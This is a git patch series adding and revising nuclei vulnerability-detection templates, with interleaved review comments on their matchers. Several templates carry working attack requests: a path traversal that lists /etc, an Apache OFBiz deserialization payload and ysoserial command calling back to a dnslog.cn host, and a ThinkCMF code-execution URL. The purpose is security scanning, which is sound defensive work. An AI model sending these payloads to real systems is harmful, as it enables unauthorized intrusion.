From 2e8c15d5fc76e2bffc9416c23a069d8baeeac875 Mon Sep 17 00:00:00 2001 From: Alan Brian <36174194+alanbriangh@users.noreply.github.com> Date: Sun, 21 Mar 2021 14:51:13 -0300 Subject: [PATCH 01/64] FIX: Add 2020-35489 detection Add 2020-35489 detection --- cves/2020/CVE-2020-35489.yaml | 116 ++++++++++++++++++++++++++++++++++ 1 file changed, 116 insertions(+) create mode 100644 cves/2020/CVE-2020-35489.yaml diff --git a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml new file mode 100644 index 0000000000..a85f0dfa06 --- /dev/null +++ b/cves/2020/CVE-2020-35489.yaml 
@@ -0,0 +1,116 @@ +id: 2020-35489 +info: + name: WordPress Contact Form 7 Plugin - Unrestricted File Upload + author: soyelmago + severity: critical + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35489 + tags: cve,cve2020,wordpress,plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Contact Form 7" + condition: and + part: body + - type: word + words: + - "2.0.7" + - "2.1" + - "2.1.2" + - "2.2" + - "2.2.1" + - "2.3" + - "2.3.1" + - "2.4" + - "2.4.1" + - "2.4.2" + - "2.4.3" + - "2.4.4" + - "2.4.5" + - "2.4.6" + - "3.0" + - "3.0.1" + - "3.0.2" + - "3.1" + - "3.1.1" + - "3.1.2" + - "3.2" + - "3.3" + - "3.3.1" + - "3.3.2" + - "3.3.3" + - "3.4" + - "3.4.1" + - "3.4.2" + - "3.5" + - "3.5.1" + - "3.5.2" + - "3.5.3" + - "3.5.4" + - "3.6" + - "3.7" + - "3.7.1" + - "3.7.2" + - "3.8" + - "3.8.1" + - "3.9" + - "3.9.1" + - "3.9.2" + - "3.9.3" + - "4.0" + - "4.0.1" + - "4.0.2" + - "4.0.3" + - "4.1" + - "4.1.1" + - "4.1.2" + - "4.2" + - "4.2.1" + - "4.2.2" + - "4.3" + - "4.3.1" + - "4.4" + - "4.4.1" + - "4.4.2" + - "4.5" + - "4.5.1" + - "4.6" + - "4.6.1" + - "4.7" + - "4.8" + - "4.8.1" + - "4.9" + - "4.9.1" + - "4.9.2" + - "5.0" + - "5.0.1" + - "5.0.2" + - "5.0.3" + - "5.0.4" + - "5.0.5" + - "5.1" + - "5.1.1" + - "5.1.2" + - "5.1.4" + - "5.1.5" + - "5.1.6" + - "5.1.7" + - "5.1.8" + - "5.1.9" + - "5.2" + - "5.2.1" + - "5.2.2" + - "5.3" + - "5.3.1" + condition: or + part: body + + From 943080c6bd19c8b5bb22f53e39fe240ceab8ab8a Mon Sep 17 00:00:00 2001 From: Alan Brian <36174194+alanbriangh@users.noreply.github.com> Date: Sun, 21 Mar 2021 14:57:32 -0300 Subject: [PATCH 02/64] FIX: Indentation --- cves/2020/CVE-2020-35489.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml index a85f0dfa06..6b3c4b6fe6 100644 --- a/cves/2020/CVE-2020-35489.yaml 
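Review bot: The version `words` matcher (`condition: or`, `part: body`) substring-matches each bare version string against the whole readme.txt, so `2.1`, `5.3` and `5.3.1` also hit inside later numbers such as `5.2.1` and `5.3.2`, and if the readme carries a changelog listing past releases, as WordPress plugin readmes commonly do (confirm against a current Contact Form 7 readme), every install matches. Anchor the check on the line that states the installed version instead: replace the word list with `- type: regex`, `regex:`, `- "(?m)^Stable tag: ([2-4]\\.[0-9.]+|5\\.[0-2](\\.[0-9]+)?|5\\.3(\\.[01])?)\\s*$"` and keep `part: body`, adjusting the alternation so it covers exactly the versions listed here (the list has bare `5.0`, `5.1`, `5.2` but no `5.1.3`, so spell out the intended set once). The status matcher and the `Contact Form 7` word still gate the check; consider whether `severity: critical` is right for a version fingerprint that does not exercise the upload itself.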
+++ b/cves/2020/CVE-2020-35489.yaml @@ -5,7 +5,6 @@ info: severity: critical reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35489 tags: cve,cve2020,wordpress,plugin - requests: - method: GET path: @@ -112,5 +111,3 @@ requests: - "5.3.1" condition: or part: body - - From f7a508ad1efdee061748ddc14c7ba583a58ec196 Mon Sep 17 00:00:00 2001 From: Alan Brian <36174194+alanbriangh@users.noreply.github.com> Date: Sun, 21 Mar 2021 15:08:38 -0300 Subject: [PATCH 03/64] FIX: Indentation --- cves/2020/CVE-2020-35489.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml index 6b3c4b6fe6..de102f664c 100644 --- a/cves/2020/CVE-2020-35489.yaml +++ b/cves/2020/CVE-2020-35489.yaml @@ -3,7 +3,8 @@ info: name: WordPress Contact Form 7 Plugin - Unrestricted File Upload author: soyelmago severity: critical - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35489 + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35489 tags: cve,cve2020,wordpress,plugin requests: - method: GET From 1f8170332a4e8c37b42e81a514eaa5b9e30b81da Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 22 Mar 2021 01:21:07 +0530 Subject: [PATCH 04/64] Update CVE-2020-35489.yaml --- cves/2020/CVE-2020-35489.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml index de102f664c..e5e97352db 100644 --- a/cves/2020/CVE-2020-35489.yaml +++ b/cves/2020/CVE-2020-35489.yaml @@ -1,9 +1,9 @@ id: 2020-35489 info: - name: WordPress Contact Form 7 Plugin - Unrestricted File Upload + name: WordPress Contact Form 7 Plugin - Unrestricted File Upload author: soyelmago severity: critical - reference: + reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35489 tags: cve,cve2020,wordpress,plugin requests: 
From 5ae86fcaef055d03728ec603c3cff531dafecb66 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 22 Mar 2021 01:22:38 +0530 Subject: [PATCH 05/64] Update CVE-2020-35489.yaml --- cves/2020/CVE-2020-35489.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml index e5e97352db..f4e2bbd516 100644 --- a/cves/2020/CVE-2020-35489.yaml +++ b/cves/2020/CVE-2020-35489.yaml @@ -1,15 +1,17 @@ -id: 2020-35489 +id: CVE-2020-35489 + info: name: WordPress Contact Form 7 Plugin - Unrestricted File Upload author: soyelmago severity: critical - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35489 + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35489 tags: cve,cve2020,wordpress,plugin + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" + matchers-condition: and matchers: - type: status From 53c0e1e954338b2e025817903dc0a6130f20516e Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 23 Mar 2021 19:56:42 +0700 Subject: [PATCH 06/64] :fire: Add CVE-2017-1000170 --- cves/2017/CVE-2017-1000170.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2017/CVE-2017-1000170.yaml diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml new file mode 100644 index 0000000000..ce1200b69f --- /dev/null +++ b/cves/2017/CVE-2017-1000170.yaml 
@@ -0,0 +1,25 @@ +id: CVE-2017-1000170 + +info: + name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal + author: dwisiswant0 + severity: high + reference: https://www.exploit-db.com/exploits/49693 + description: jqueryFileTree 2.1.5 and older Directory Traversal + tags: cve,cve2017,wp-plugin,traversal + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php" + body: "dir=%2Fetc%2F&onlyFiles=true" + matchers-condition: and + matchers: + - type: word + words: + - "
  • " + condition: and + part: body + - type: status + status: + - 200 \ No newline at end of file From 2e233a0aa2a0932ae0505ae919f30d5d26dda904 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 23 Mar 2021 19:56:56 +0700 Subject: [PATCH 07/64] :hammer: Update matchers --- cves/2017/CVE-2017-1000170.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml index ce1200b69f..c92526fa51 100644 --- a/cves/2017/CVE-2017-1000170.yaml +++ b/cves/2017/CVE-2017-1000170.yaml @@ -18,6 +18,7 @@ requests: - type: word words: - "
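Review bot: The body `words` matcher has one term that this rendering shows only as list markup (the tag text itself is not visible here), and any directory that jqueryFileTree.php is willing to list returns the same markup, so the match does not show that `dir=%2Fetc%2F` actually reached /etc; require a token only that directory yields, as the follow-up 2e233a0a does with `passwd`, and keep `condition: and`. The new file also ends without a trailing newline (`\ No newline at end of file` after `- 200`), which yamllint's `new-line-at-end-of-file` rule flags.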
  • " + - "passwd
  • " condition: and part: body - type: status From e49b4a7d8aa315158ca6ff4c8acbdfcd6ce926b2 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 23 Mar 2021 19:57:15 +0700 Subject: [PATCH 08/64] :pencil2: Add wordpress to tags --- cves/2017/CVE-2017-1000170.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml index c92526fa51..dc365005e0 100644 --- a/cves/2017/CVE-2017-1000170.yaml +++ b/cves/2017/CVE-2017-1000170.yaml @@ -6,7 +6,7 @@ info: severity: high reference: https://www.exploit-db.com/exploits/49693 description: jqueryFileTree 2.1.5 and older Directory Traversal - tags: cve,cve2017,wp-plugin,traversal + tags: cve,cve2017,wordpress,wp-plugin,traversal requests: - method: POST From a8149d0cfcadbe0a3fea0f8c70f72f399d7dd63b Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:30:15 +0530 Subject: [PATCH 09/64] Create CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 59 +++++++++++++++++++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 cves/2021/CVE-2021-26295.yaml diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml new file mode 100644 index 0000000000..5ab6b8a4ea --- /dev/null +++ b/cves/2021/CVE-2021-26295.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2021-26295 +info: + name:Apache OFBiz RMI deserializes Arbitrary Code Execution + author: madrobot + severity: critical + tags: apache,cve,cve2021,rce + description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295 + + # Note:- This is detection template To perform deserializes + # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot + # hex mad.ot and replace in along with the user in std-String value +requests: + - raw: + - | + POST /webtools/control/SOAPService HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 + Connection: close + Content-Type: application/xml + Content-Length: 910 + + + + + + + + + + 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 + + + + + + + + + + + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "OFBiz.Visitor=" + part: header + - type: word + words: + - "null (Illegal hexadecimal character at index 0)" + - "errorMessage" + part: body From d392432b15a1790c95b6ebdcc9b54ed493bc76ef Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:32:09 +0530 Subject: [PATCH 10/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 5ab6b8a4ea..3b224d5fa5 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml 
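Review bot: The serialized object in the raw request (and the replacement hex in a2ab8b67, which still encodes the same host) carries a DNS callback to `t53lq9.dnslog.cn`, a public third-party logging service outside the operator's control, so every run discloses the scanned host to that service while the template never reads the callback — detection rests only on the two body words. Point the callback at an endpoint the operator owns (nuclei's `{{interactsh-url}}`, if the engine version in use supports it) or use a payload with no external callback, and say so in the `# Note` block. `Content-Length: 910` is hard-coded for a body that is hand-edited hex; unless the engine recomputes it, a later payload edit (a2ab8b67 makes one) silently desynchronises the header, so drop the line. The body `words` matcher has no `condition`, so `errorMessage` alone — a generic OFBiz error token — is enough to fire; patch 20/64 later adds `condition: and`.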
@@ -1,6 +1,6 @@ id: CVE-2021-26295 info: - name:Apache OFBiz RMI deserializes Arbitrary Code Execution + name: Apache OFBiz RMI deserializes Arbitrary Code Execution author: madrobot severity: critical tags: apache,cve,cve2021,rce From 744e4c504cda48f341910ad0352d838bac825791 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:42:35 +0530 Subject: [PATCH 11/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 3b224d5fa5..06d27c2790 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -7,7 +7,7 @@ info: description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295 - # Note:- This is detection template To perform deserializes + # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot # hex mad.ot and replace in along with the user in std-String value requests: From a2ab8b67e5fd15e629d10f7252e0c70821097a12 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:42:58 +0530 Subject: [PATCH 12/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 06d27c2790..1e87d42cec 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml 
@@ -30,8 +30,7 @@ requests: - - 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 + bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a From 3f3357f2a6fd7ff3ec2d7a00e21582c698e9dc47 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:48:13 +0530 Subject: [PATCH 13/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 1e87d42cec..634b2cfb13 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -9,7 +9,7 @@ info: # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot - # hex mad.ot and replace in along with the user in std-String value + # `cat mad.ot | hex` and replace in along with the url in std-String value requests: - raw: - | From f6daf90e92ecbb3a506a2a4898fc367ea60685a6 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 23 Mar 2021 17:50:47 +0000 Subject: [PATCH 14/64] Update wordpress-takeover.yaml Better matcher fix. \m/ --- takeovers/wordpress-takeover.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/takeovers/wordpress-takeover.yaml b/takeovers/wordpress-takeover.yaml index 96fdc32d4d..f1e6462e51 100644 
--- a/takeovers/wordpress-takeover.yaml +++ b/takeovers/wordpress-takeover.yaml @@ -12,9 +12,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - 'Do you want to register' - - '*.wordpress.com' - condition: and \ No newline at end of file + + - type: regex + regex: + - "[a-zA-Z0-9][a-zA-Z0-9-_]*\.)*[a-zA-Z0-9]*[a-zA-Z0-9-_]*[[a-zA-Z0-9].wordpress.com" From de9bcdaa5b8f7eb13bcdb29b704a070562023559 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 23 Mar 2021 17:52:57 +0000 Subject: [PATCH 15/64] Update wordpress-takeover.yaml --- takeovers/wordpress-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/wordpress-takeover.yaml b/takeovers/wordpress-takeover.yaml index f1e6462e51..6ddfd103bb 100644 --- a/takeovers/wordpress-takeover.yaml +++ b/takeovers/wordpress-takeover.yaml @@ -20,4 +20,4 @@ requests: - type: regex regex: - - "[a-zA-Z0-9][a-zA-Z0-9-_]*\.)*[a-zA-Z0-9]*[a-zA-Z0-9-_]*[[a-zA-Z0-9].wordpress.com" + - "[a-zA-Z0-9][a-zA-Z0-9-_]*\\.)*[a-zA-Z0-9]*[a-zA-Z0-9-_]*[[a-zA-Z0-9].wordpress.com" From 92b21256764b045658c0b457ff52a52b2ecd1f20 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 23 Mar 2021 17:58:48 +0000 Subject: [PATCH 16/64] Update wordpress-takeover.yaml --- takeovers/wordpress-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/wordpress-takeover.yaml b/takeovers/wordpress-takeover.yaml index 6ddfd103bb..226e0737e7 100644 --- a/takeovers/wordpress-takeover.yaml +++ b/takeovers/wordpress-takeover.yaml @@ -2,7 +2,7 @@ id: wordpress-takeover info: name: wordpress takeover detection - author: pdcommunity + author: pdcommunity & geeknik severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz From 7c5e7f48ff0bd1c4eca7725c03838a60b7fa9533 Mon Sep 17 00:00:00 2001 
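Review bot: The regex in the new `- type: regex` matcher does not compile: `[a-zA-Z0-9-_]*\.)*` closes a group that was never opened, and Go's regexp, which nuclei uses, rejects an unmatched `)`, so the template fails to load instead of matching loosely; the `\\.` change in de9bcdaa only repairs the YAML escape and leaves this in place. Inside the classes, `9-_` is parsed as a range (admitting `:`, `@`, `\`, `^` and more), `[[a-zA-Z0-9]` adds a literal `[`, and the dot in `.wordpress.com` is unescaped. A balanced form with the hyphen last: `- "([a-zA-Z0-9][a-zA-Z0-9_-]*\\.)*[a-zA-Z0-9][a-zA-Z0-9_-]*\\.wordpress\\.com"`.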
From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 23 Mar 2021 18:00:14 +0000 Subject: [PATCH 17/64] Update wordpress-takeover.yaml --- takeovers/wordpress-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/wordpress-takeover.yaml b/takeovers/wordpress-takeover.yaml index 226e0737e7..1d43a86846 100644 --- a/takeovers/wordpress-takeover.yaml +++ b/takeovers/wordpress-takeover.yaml @@ -1,10 +1,10 @@ id: wordpress-takeover info: - name: wordpress takeover detection + name: WordPress takeover detection author: pdcommunity & geeknik severity: high - tags: takeover + tags: takeover,wordpress reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: From c8646b6f92b21ab1987e2e7261d6d70adc215040 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 23 Mar 2021 19:13:34 +0000 Subject: [PATCH 18/64] Update wordpress-takeover.yaml nuclei -t /tmp/wordpress-takeover.yaml -target https://9824q75q435yq2345.wordpress.com [2021-03-23 14:12:16] [wordpress-takeover] [http] [high] https://9824q75q435yq2345.wordpress.com --- takeovers/wordpress-takeover.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/takeovers/wordpress-takeover.yaml b/takeovers/wordpress-takeover.yaml index 1d43a86846..34205346dd 100644 --- a/takeovers/wordpress-takeover.yaml +++ b/takeovers/wordpress-takeover.yaml @@ -12,6 +12,7 @@ requests: path: - "{{BaseURL}}" + redirects: true matchers-condition: and matchers: - type: word From 356856a9836893b592306585467f81924d8f2d20 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 24 Mar 2021 01:10:20 +0000 Subject: [PATCH 19/64] Create thinkcmf-arbitrary-code-execution.yaml --- .../thinkcmf-arbitrary-code-execution.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml 
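Review bot: `redirects: true` is added without `max-redirects`, so the request follows a chain up to the engine's default limit and the matchers run against whatever host the chain ends on; that is the point for a takeover check, but cap it (`max-redirects: 2` should cover the single hop a dangling wordpress.com name produces) so a target that redirects elsewhere cannot lead the scan around. The commit message records a run against a live unregistered wordpress.com name, which exercises only the positive case; a run against a registered blog would show whether `Do you want to register` is absent there.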
diff --git a/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml b/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml new file mode 100644 index 0000000000..bdd83bd1ef --- /dev/null +++ b/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml @@ -0,0 +1,25 @@ +id: thinkcmf-arbitrary-code-execution + +info: + name: ThinkCMF Arbitrary code execution + author: pikpikcu + severity: high + reference: https://www.shuzhiduo.com/A/l1dygr36Je/ + tags: thinkcmf + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?g=g&m=Door&a=index&content= Date: Wed, 24 Mar 2021 13:00:26 +0530 Subject: [PATCH 20/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 634b2cfb13..aed35553ad 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -3,13 +3,14 @@ info: name: Apache OFBiz RMI deserializes Arbitrary Code Execution author: madrobot severity: critical - tags: apache,cve,cve2021,rce + tags: apache,cve,cve2021,rce,ofbiz description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295 # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot # `cat mad.ot | hex` and replace in along with the url in std-String value + requests: - raw: - | @@ -56,3 +57,4 @@ requests: - "null (Illegal hexadecimal character at index 0)" - "errorMessage" part: body + condition: and From dbaf44593323ee60fa06a49335b9dd2456d44817 Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 13:02:29 +0530 Subject: [PATCH 21/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index aed35553ad..8cf8fc5e37 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -10,6 +10,7 @@ info: # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot # `cat mad.ot | hex` and replace in along with the url in std-String value + # Exploit: https://github.com/yumusb/CVE-2021-26295-POC requests: - raw: From 86ad55d66fc836b89c6c4b3974579eda53202ca1 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 14:07:22 +0530 Subject: [PATCH 22/64] Adding to workflow --- cves/2017/CVE-2017-1000170.yaml | 2 +- workflows/wordpress-workflow.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml index dc365005e0..cb3e001dd0 100644 --- a/cves/2017/CVE-2017-1000170.yaml +++ b/cves/2017/CVE-2017-1000170.yaml @@ -6,7 +6,7 @@ info: severity: high reference: https://www.exploit-db.com/exploits/49693 description: jqueryFileTree 2.1.5 and older Directory Traversal - tags: cve,cve2017,wordpress,wp-plugin,traversal + tags: cve,cve2017,wordpress,wp-plugin,lfi requests: - method: POST diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 4249d902c9..e6aa4f7d72 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -11,6 +11,7 @@ workflows: matchers: - name: wordpress subtemplates: + - template: cves/2017/CVE-2017-1000170.yaml - template: cves/2018/CVE-2018-3810.yaml - template: cves/2019/CVE-2019-6112.yaml - template: cves/2019/CVE-2019-6715.yaml 
From d6931a54c1d23cc017a92df976f711997f572316 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Mar 2021 08:39:41 +0000 Subject: [PATCH 23/64] Auto Update README [Wed Mar 24 08:39:41 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a5d0c6fb0a..efb74a15e2 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 252 | vulnerabilities | 116 | exposed-panels | 108 | +| cves | 253 | vulnerabilities | 116 | exposed-panels | 108 | | takeovers | 65 | exposures | 63 | technologies | 51 | | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 | | default-logins | 20 | exposed-tokens | 9 | dns | 8 | | fuzzing | 5 | helpers | 3 | iot | 7 | -**79 directories, 827 files**. +**79 directories, 828 files**. From b8dd11c644eef9fe1ea43263cc449b8cd29bdc8b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 14:18:41 +0530 Subject: [PATCH 24/64] Adding adminer-panel-fuzz --- fuzzing/adminer-panel-fuzz.yaml | 46 ++ helpers/wordlists/adminer-paths.txt | 741 ++++++++++++++++++++++++++++ 2 files changed, 787 insertions(+) create mode 100644 fuzzing/adminer-panel-fuzz.yaml create mode 100644 helpers/wordlists/adminer-paths.txt diff --git a/fuzzing/adminer-panel-fuzz.yaml b/fuzzing/adminer-panel-fuzz.yaml new file mode 100644 index 0000000000..17229354b9 --- /dev/null +++ b/fuzzing/adminer-panel-fuzz.yaml 
@@ -0,0 +1,46 @@ +id: adminer-panel-fuzz +info: + name: Adminer Login Panel Fuzz + author: random-robbie & meme-lord + severity: info + reference: https://blog.sorcery.ie/posts/adminer/ + tags: fuzz,adminer + + # <= 4.2.4 can have unauthenticated RCE via SQLite driver + # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL + # Most versions have some kind of SSRF usability + # Is generally handy if you find SQL creds + +requests: + + - payloads: + path: helpers/wordlists/adminer-paths.txt + + attack: sniper + threads: 50 + + raw: + - | + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Accept-Language: en-US,en;q=0.5 + Referer: {{BaseURL}} + + matchers-condition: and + matchers: + + - type: word + words: + - "Login - Adminer" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '([0-9.]+)' diff --git a/helpers/wordlists/adminer-paths.txt b/helpers/wordlists/adminer-paths.txt new file mode 100644 index 0000000000..602d7b2d27 --- /dev/null +++ b/helpers/wordlists/adminer-paths.txt 
